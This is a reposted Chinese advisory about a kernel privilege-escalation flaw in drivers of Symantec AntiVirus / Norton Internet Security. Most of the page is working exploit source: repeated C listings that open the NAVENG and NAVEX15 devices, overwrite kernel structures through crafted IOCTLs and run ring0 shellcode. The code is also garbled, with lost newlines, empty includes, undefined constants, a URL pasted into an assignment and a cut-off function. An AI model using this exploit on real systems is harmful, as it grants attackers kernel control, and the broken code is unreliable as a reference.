
Symantec AntiVirus IOCTL内核权限提升漏洞

作者: 来源: 2012-06-12 23:49:26 阅读 我要评论


信息提供:

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

内存处理漏洞

攻击类型:

本地或远程攻击

发布日期:

2005-10-05

更新日期:

2005-10-08

受影响系统:

Symantec AntiVirus 所有版本

安全系统:

漏洞报告人:

rgod

漏洞描述:

Bugtraq ID: 20360

Symantec AntiVirus是非常流行的杀毒解决方案。

Symantec AntiVirus的NAVEX15.SYS和NAVENG.SYS设备驱动的IOCTL处理器没有充分验证用户态传入的缓冲区地址,允许攻击者使用常数的双字值覆盖任意内核内存。

如果攻击者能够向0x222AD3、0x222AD7和0x222ADB IOCTL处理器发送特制的I/O请求报文的话,就会导致以内核权限执行任意指令。

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负

////////////////////////////////////
///// Norton Internet Security
////////////////////////////////////
//// For educational purposes;
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt = BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVENG",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploit]nn");
printf("INFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVENG Device Handle [%x]n",hDevice);
//////////////////////
///// IOCTL
//////////////////////
OutSize = 4;
dwIOCTL = 0x222AD3;
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
else Ring0Addr = BaseNt + W2K_SWITCH;
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]n",Ring0Addr);
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
,0xF000
,MEM_COMMIT|MEM_RESERVE
,PAGE_EXECUTE_READWRITE);
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)Ring0Addr,OutSize,
&junk,
NULL);
system("dir"); // NtQuerySystemInformation Nasty Hack ;
/////////////////////
///// CLeanUp
/////////////////////
CloseHandle(hDevice);
free(ShellAddr);
printf("nn[*] Exploit terminatednn");
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes; //"PUT YOUR RING0 CODE HERE "
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt=BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
else InXP = FALSE;
//////////////////////////////////////
////// STAGE 1
//////////////////////////////////////
if(InXP) BaseNt += WXP_USERPROBE;
else BaseNt += W2K_USERPROBE;
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVENG",
0,
0,
NULL,
3,
0,
0);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploitt[Stage 1]nn");
printf("nINFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVENG Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 4;
OutBuff = malloc(sizeof(DWORD));
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x222ADB;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] mmUserProbeAddress current value:t[0x7FFF0000]n");
printf("[!] Overwriting mmUserProbeAddress at:t[0x%x] n",BaseNt);
printf("[!] mmUserProbeAddress current value:t[0x%x]n",OutBuff[0]);
printf("[*] ProbeForWrite now checking for values greater than 0x%xnn",OutBuff[0]);
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)BaseNt,OutSize,
&junk,
NULL);
mmUserProbe=OutBuff[0];
free((LPVOID)OutBuff);
CloseHandle(hDevice);
//////////////////////
///// STAGE 2
//////////////////////
BaseNt = BaseAuxNt;
/////////////////////////
printf("nn** Initializing Exploitt[Stage 2]nn");
addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
InBuff=OutBuff;
printf("[!] Checking Shadow Device...");
hDevice = CreateFile("\\.\shadow",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]n");
printf("[!] Exploiting Shadow Device...n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("rt[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION;
else Ring0Addr = BaseNt + W2K_EXCEPTION;
printf("n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]");
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
0x141043,
InBuff, 2,
(LPVOID)mmUserProbe+0x1000, 0x18,
&junk,
(LPOVERLAPPED) NULL);
CloseHandle(hDevice);
printf("nn[*] Exploit terminatednn");
/////////////////////
///// CLeanUp
/////////////////////
free(OutBuff);
return 0;
}
////////////////////////////////////
///// Norton Internet Security
/////////////////////////////////////////////
//// For educational purposes;
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt = BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVEX15",
0,
0,
NULL,
3,
0,
0);
//////////////////////
///// INFO
//////////////////////
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploit]nn");
printf("INFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVEX15 Device Handle [%x]n",hDevice);
//////////////////////
///// IOCTL
//////////////////////
OutSize = 4;
dwIOCTL = 0x222AD3;
if(strncmp(argv[1],"XP",2)==0) Ring0Addr = BaseNt + WXP_SWITCH;
else Ring0Addr = BaseNt + W2K_SWITCH;
printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]n",Ring0Addr);
ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
,0xF000
,MEM_COMMIT|MEM_RESERVE
,PAGE_EXECUTE_READWRITE);
for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)Ring0Addr,OutSize,
&junk,
NULL);
system("dir");
/////////////////////
///// CLeanUp
/////////////////////
CloseHandle(hDevice);
free(ShellAddr);
printf("nn[*] Exploit terminatednn");
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes; //"PUT YOUR RING0 CODE HERE "
system("cls");
printf("n################################n");
printf("## Norton I.S ##n");
printf("## Ring0 Exploit ##n");
printf("################################n");
printf("nRuben Santamartanwww.reversemode.comnn");
if(argc<2)
{
printf("nusage> exploit.exe or <2K>n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt=BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not foundnexitingnn");
exit(0);
}
if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
else InXP = FALSE;
//////////////////////////////////////
////// STAGE 1
//////////////////////////////////////
if(InXP) BaseNt += WXP_USERPROBE;
else BaseNt += W2K_USERPROBE;
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\.\NAVEX15",
0,
0,
NULL,
3,
0,
0);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("nn** Initializing Exploitt[Stage 1]nn");
printf("nINFORMATION n");
printf("-----------------------------------------------------n");
printf("[!] NAVEX15 Device Handle [%x]n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 4;
OutBuff = malloc(sizeof(DWORD));
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x222AD7;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] mmUserProbeAddress current value:t[0x7FFF0000]n");
printf("[!] Overwriting mmUserProbeAddress at:t[0x%x] n",BaseNt);
printf("[!] mmUserProbeAddress current value:t[0x%x]n",OutBuff[0]);
printf("[*] ProbeForWrite now checking for values greater than 0x%xnn",OutBuff[0]);
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)BaseNt,OutSize,
&junk,
NULL);
mmUserProbe=OutBuff[0];
free((LPVOID)OutBuff);
CloseHandle(hDevice);
//////////////////////
///// STAGE 2
//////////////////////
BaseNt = BaseAuxNt;
/////////////////////////
printf("nn** Initializing Exploitt[Stage 2]nn");
addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
InBuff=OutBuff;
printf("[!] Checking Shadow Device...");
hDevice = CreateFile("\\.\shadow",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]n");
printf("[!] Exploiting Shadow Device...n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("rt[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION;
else Ring0Addr = BaseNt + W2K_EXCEPTION;
printf("n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
DeviceIoControl(hDevice, // "\.shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]");
printf("nntt[!] Initializing Countdown,last chance to abort.");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
for(i=10;i>=1;i--)
{
printf("r -[ %d ]- ",i);
if(i==1) printf("nn[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
0x141043,
InBuff, 2,
(LPVOID)mmUserProbe+0x1000, 0x18,
&junk,
(LPOVERLAPPED) NULL);
CloseHandle(hDevice);
printf("nn[*] Exploit terminatednn");
/////////////////////
///// CLeanUp
/////////////////////
free(OutBuff);
return 0;
}
/////////////////////////////////////////////
///// Norton Internet Security /////
/////////////////////////////////////////////
//// For educational purposes ONLY
/////////////////////////////////////////////
//// Ring0 xploit
//// Rubén Santamarta
//// www.reversemode.com
//// 26/08/2006
////////////////////////////////////
// NOTE(review): the header names were lost when this listing was pasted onto
// the page; both `#include` lines below are empty and will not preprocess as-is.
#include
#include
// Build-specific offsets, relative to the ntoskrnl.exe base that the listings
// locate at runtime through EnumDeviceDrivers/GetDeviceDriverBaseNameA. They
// match only the exact Windows XP / 2000 kernel builds the author worked with;
// on any other build the arithmetic that adds them to the base points at
// unrelated memory, which is why a PoC of this kind typically crashes rather
// than works elsewhere. The WXP_SWITCH / W2K_SWITCH constants used by the
// first and third listings are not defined here — presumably lost in the paste.
#define WXP_USERPROBE 0x87E34
#define W2K_USERPROBE 0x81B1C
#define WXP_EXCEPTION 0x16F120
#define W2K_EXCEPTION 0x944b6
// Function-pointer types for the two psapi.dll exports the listings resolve by
// name with GetProcAddress ("EnumDeviceDrivers" and "GetDeviceDriverBaseNameA").
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
LPTSTR lpBaseName,
DWORD nSize);
DWORD CalcJump(DWORD BaseNt,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{
DWORD SumTemp,IniAddress,i,sumAux,addTemp,OffWord;
if(InXP)
{
SumTemp=BaseNt+WXP_EXCEPTION+0xE;
OffWord=0x64B8;
}
else
{
SumTemp=BaseNt+W2K_EXCEPTION+0xE;
OffWord=0x5358;
}
for(i=0x4c;i<0xDDDC;i=i+4)
{
sumAux=~((i*0x10000)+OffWord);
addTemp=SumTemp-sumAux;
if(addTemp>0xE000000 && addTemp<0xF000000){
IniAddress=addTemp&0xFFFFF000;
*hValue=http://netsecurity.51cto.com/art/200610/i-4;
*ShellAddr=addTemp;
break;
&nbs

解决方法:

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.symantec.com/


本文标题:Symantec AntiVirus IOCTL内核权限提升漏洞

地址:http://www.17bianji.com/anquan/buding/2970.html
